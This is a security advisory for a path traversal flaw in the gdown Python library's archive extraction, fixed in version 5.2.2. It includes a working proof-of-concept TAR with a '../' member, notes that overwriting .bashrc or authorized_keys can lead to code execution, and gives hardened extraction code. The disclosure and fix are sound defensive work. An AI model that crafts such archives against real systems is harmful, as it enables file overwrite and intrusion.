6.5
gdown: Malicious Archives Can Overwrite Files Outside Destination Directory
GHSA-76hw-p97h-883f
Summary
The gdown library can extract files from archives in a way that allows malicious files to be written outside the intended destination directory, potentially leading to sensitive data being overwritten or compromised. This is a security risk because it could allow an attacker to take control of your system. To protect yourself, make sure to update to the latest version of gdown or use an alternative library for extracting archives.
What to do
- Update gdown to version 5.2.2.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| pip | – | gdown | <= 5.2.1 (fix: upgrade to 5.2.2) |
Original title
gdown Affected by Arbitrary File Write via Path Traversal in gdown.extractall
Original description
### Summary
The gdown library (tested on v5.2.1) is vulnerable to a Path Traversal attack within its extractall functionality. When extracting a maliciously crafted ZIP or TAR archive, the library fails to sanitize or validate the filenames of the archive members. This allows files to be written outside the intended destination directory, potentially leading to arbitrary file overwrite and Remote Code Execution (RCE).
### Details
The vulnerability exists in `gdown/extractall.py` within the `extractall()` function. The function takes an archive path and a destination directory (`to`), then calls the underlying `extractall()` method of Python's `tarfile` or `zipfile` modules without validating whether the archive members stay within the `to` boundary.
Vulnerable Code:
```python
# gdown/extractall.py
def extractall(path, to=None):
    # ... (omitted) ...
    with opener(path, mode) as f:
        f.extractall(path=to)  # Vulnerable: No path validation or filters
```
Even on modern Python versions (3.12+), if the `filter` parameter is not explicitly set or if the library's wrapper logic bypasses modern protections, path traversal remains possible as demonstrated in the PoC.
### PoC
#### Steps to Reproduce
1. Create the Malicious Archive (`poc.py`):
```python
import tarfile
import io
import os

# Create a target directory
os.makedirs("./safe_target/subfolder", exist_ok=True)

# Generate a TAR file containing a member with path traversal
with tarfile.open("evil.tar", "w") as tar:
    # Target: escape the subfolder and write to the parent 'safe_target'
    payload = tarfile.TarInfo(name="../escape.txt")
    content = b"Path Traversal Success!"
    payload.size = len(content)
    tar.addfile(payload, io.BytesIO(content))

print("[+] evil.tar created.")
```
2. Execute the Vulnerable Function:
```shell
python3 -c "from gdown import extractall; extractall('evil.tar', to='./safe_target/subfolder')"
```
3. Verify the Escape:
```shell
ls -l ./safe_target/escape.txt
# Output: -rw-r--r-- 1 user user 23 Mar 15 2026 ./safe_target/escape.txt
```
### Impact
An attacker can provide a specially crafted archive that, when extracted via `gdown`, overwrites critical files on the victim's system.
- Arbitrary File Overwrite: Overwriting `.bashrc`, `.ssh/authorized_keys`, or configuration files.
- Remote Code Execution (RCE): By overwriting executable scripts or Python modules within a virtual environment.
### Recommended Mitigation
Implement path validation to ensure that all extracted files are contained within the target directory.
**Suggested Fix:**
```python
import os
import tarfile


def is_within_directory(directory, target):
    abs_directory = os.path.abspath(directory)
    abs_target = os.path.abspath(target)
    prefix = os.path.commonpath([abs_directory])
    return os.path.commonpath([abs_directory, abs_target]) == prefix


# Inside extractall.py
with opener(path, mode) as f:
    if isinstance(f, tarfile.TarFile):
        for member in f.getmembers():
            member_path = os.path.join(to, member.name)
            if not is_within_directory(to, member_path):
                raise Exception("Attempted Path Traversal in Tar File")
    f.extractall(path=to)
```
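As an added example (not gdown's own code and not the reporter's suggested fix above), the following hardened extractor applies the containment check from the Recommended Mitigation to both ZIP and TAR members, additionally rejects absolute member names and tar links that point outside the destination, and on Python versions that ship `tarfile.data_filter` (3.12+ and the backports) also passes the stdlib `filter="data"` discussed in the Details section. The names `safe_extractall`, `check_member`, `check_symlink`, `build_tar` and `demo` are this example's own; the archives it builds are constructed sample input so it runs offline.

```python
# Added example (not gdown's own code): a hardened extractall() that rejects any
# ZIP or TAR member that would land outside the destination directory.
import io
import os
import tarfile
import tempfile
import zipfile


class UnsafeArchiveMember(ValueError):
    """Raised when an archive member would escape the destination directory."""


def is_within_directory(directory: str, target: str) -> bool:
    # realpath() collapses '..' and resolves symlinks, so a member named
    # '../escape.txt' joined onto the destination resolves to its parent.
    abs_directory = os.path.realpath(directory)
    abs_target = os.path.realpath(target)
    return os.path.commonpath([abs_directory, abs_target]) == abs_directory


def check_member(to: str, name: str) -> None:
    """Reject absolute member names and any name that resolves outside `to`."""
    if os.path.isabs(name):
        raise UnsafeArchiveMember(f"absolute member path: {name!r}")
    if not is_within_directory(to, os.path.join(to, name)):
        raise UnsafeArchiveMember(f"path traversal in member: {name!r}")


def check_symlink(to: str, name: str, target: str) -> None:
    """A symlink escaping `to` lets a later member write through it, so the
    target is resolved relative to the link's own directory and checked too."""
    link_dir = os.path.dirname(os.path.join(to, name))
    if os.path.isabs(target) or not is_within_directory(to, os.path.join(link_dir, target)):
        raise UnsafeArchiveMember(f"symlink {name!r} escapes destination: {target!r}")


def safe_extractall(path: str, to: str) -> list:
    """Extract `path` into `to`; every member is validated before anything is
    written, so a bad archive is refused whole instead of partially extracted.
    Returns the member names that were extracted."""
    os.makedirs(to, exist_ok=True)
    if tarfile.is_tarfile(path):
        with tarfile.open(path) as tar:
            members = tar.getmembers()
            for m in members:
                check_member(to, m.name)
                if m.islnk():   # hard-link target is a path inside the archive
                    check_member(to, m.linkname)
                elif m.issym():  # symlink target is relative to the link itself
                    check_symlink(to, m.name, m.linkname)
            if hasattr(tarfile, "data_filter"):
                # Python 3.12+ (and backports): the stdlib 'data' filter is a
                # second line of defence, but only when the caller asks for it.
                tar.extractall(path=to, filter="data")
            else:
                tar.extractall(path=to)
            return [m.name for m in members]
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as zf:
            names = zf.namelist()
            for name in names:
                check_member(to, name)
            zf.extractall(path=to)
            return names
    raise ValueError(f"not a ZIP or TAR archive: {path!r}")


def build_tar(archive_path: str, members: dict) -> str:
    """Constructed sample input: a TAR built from {member_name: bytes}."""
    with tarfile.open(archive_path, "w") as tar:
        for name, content in members.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return archive_path


def demo() -> dict:
    """Extract a benign archive and a traversal archive into a scratch directory
    and report what was written and what was refused."""
    with tempfile.TemporaryDirectory() as workdir:
        dest = os.path.join(workdir, "safe_target", "subfolder")
        good = build_tar(os.path.join(workdir, "good.tar"), {"notes/readme.txt": b"ok"})
        bad = build_tar(os.path.join(workdir, "traversal.tar"),
                        {"../escape.txt": b"Path Traversal Success!"})
        extracted = safe_extractall(good, dest)
        try:
            safe_extractall(bad, dest)
            rejected = None
        except UnsafeArchiveMember as exc:
            rejected = str(exc)
        return {
            "extracted": extracted,
            "rejected": rejected,
            "benign_written": os.path.isfile(os.path.join(dest, "notes", "readme.txt")),
            "escaped": os.path.exists(os.path.join(workdir, "safe_target", "escape.txt")),
        }


if __name__ == "__main__":
    print(demo())
```

Running the file extracts the benign archive and reports the refused traversal member. Two design points: CPython's `zipfile.extractall` already strips leading slashes and `..` components from member names, so the ZIP branch mainly turns a silent rename into an explicit rejection, whereas the TAR branch is where the check decides the outcome; and even where `filter="data"` is available, validating every member before writing any of them means the archive is refused up front rather than failing part-way through with earlier members already on disk.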
CVSS 3.1 (GHSA): 6.5
Vulnerability type: CWE-22 Path Traversal
Published: 14 Apr 2026 · Updated: 14 Apr 2026 · First seen: 14 Apr 2026